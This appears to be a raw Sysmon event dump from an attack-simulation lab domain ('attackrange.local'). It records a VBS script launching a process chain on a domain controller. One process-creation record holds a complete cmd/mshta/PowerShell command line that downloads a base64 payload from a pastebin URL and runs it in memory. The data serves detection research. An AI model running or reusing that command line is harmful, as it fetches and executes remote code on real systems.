08:03:04.618{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107826Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.618{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107825Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.618{58E9C193-B538-615A-6802-00000000FC01}81002236C:\Windows\System32\WScript.exe{58E9C193-B538-615A-6902-00000000FC01}4200C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107824Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.625{58E9C193-B538-615A-6902-00000000FC01}4200C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000107823Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.618{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\WScript.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107822Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.618{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000107821Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.519{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnk2021-10-04 07:44:21.848 23542300x8000000000000000107820Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.519{58E9C193-AE68-615A-C800-00000000FC01}4548ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnkMD5=642C62307447620440C93C08823AA13E,SHA256=CC584070BD0F764A9F68AB2CC37C57C3C7D7E0C2BDD87F6B219A37FD908E88BF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000107819Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.503{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\_______ _____ ___ ______ ______.vbs.lnk2021-10-04 07:44:21.816 23542300x8000000000000000107818Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.503{58E9C193-AE68-615A-C800-00000000FC01}4548ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\_______ _____ ___ ______ ______.vbs.lnkMD5=057B63B9E87D6196335CB53AD7254AC9,SHA256=FE262C49DEA0754C4FFC25FED020A003289E00DA37E36B0139E91A0691A076CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107817Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.472{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107816Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.472{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\WScript.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107815Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.472{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\WScript.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107814Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.440{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107813Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.440{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107812Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.440{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\WScript.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107811Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.440{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107810Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.440{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107809Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.440{58E9C193-AE68-615A-C800-00000000FC01}45485800C:\Windows\Explorer.EXE{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\WScript.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\windows.storage.dll+ad62a|C:\Windows\System32\windows.storage.dll+ad3e2|C:\Windows\System32\SHELL32.dll+3f8bd|C:\Windows\System32\SHELL32.dll+3e456|C:\Windows\System32\SHELL32.dll+801d1|C:\Windows\System32\SHELL32.dll+6716e|C:\Windows\System32\SHELL32.dll+18cf2c|C:\Windows\System32\SHELL32.dll+18cc83|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107808Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.445{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=95B2CC3A306C4C1059A53B660096F0A5,SHA256=8B2E206D1F6B510AD73C7541C03F39F9E4DDD7E3D1B9E31F3C8829C64B42E075,IMPHASH=661A40859BC6D47752E9FC5E02C1862C{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x8000000000000000107807Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.132{58E9C193-B537-615A-6702-00000000FC01}81528172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000107806Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.116{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=72AA83ED9A33935E3E5DC9A468A72A4A,SHA256=A48E5A34BFBC39739DA374DADAD47E20F9EF4AB31F1B050A3876E97750277B3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083662Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:05.495{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E32CAAE42184D08B92A071B04E207B7,SHA256=EE1E15EEF875F467577DF962AAD7EDE1D89BE45D1F0B2560D33F9DE9A9B29862,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108032Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.698{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9259AF7711F20789A411D36DB39E126B,SHA256=60CEA21E751F5054C490778E4ACF598E9215B0AEE2352AABE39C0788AE2D59F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108031Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.629{58E9C193-B538-615A-7702-00000000FC01}7376ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108030Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.614{58E9C193-B538-615A-7C02-00000000FC01}2956ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108029Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.551{58E9C193-B538-615A-6B02-00000000FC01}7816ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108028Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.529{58E9C193-B538-615A-6D02-00000000FC01}6984ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108027Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.529{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B539-615A-7E02-00000000FC01}8404C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108026Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.529{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108025Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.529{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108024Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.529{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108023Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.529{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108022Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 